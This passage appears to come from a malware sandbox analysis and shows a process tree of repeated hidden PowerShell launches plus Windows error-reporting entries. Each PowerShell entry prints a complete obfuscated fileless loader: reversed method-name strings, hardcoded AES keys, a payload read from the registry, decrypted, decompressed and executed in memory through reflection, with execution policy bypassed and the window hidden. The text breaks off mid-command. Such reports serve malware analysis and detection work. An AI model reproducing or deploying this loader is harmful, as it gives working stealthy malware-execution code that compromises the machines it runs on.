$OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        
        PID:5276
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        
        PID:5988
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        
        PID:2764
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2848).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        13⤵
        
        PID:5284
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2848" "2972" "2728" "2976" "0" "0" "2980" "0" "0" "0" "0" "0"
        13⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6796
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6068" "2988" "2804" "2992" "0" "0" "2996" "0" "0" "0" "0" "0"
        12⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6524
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, 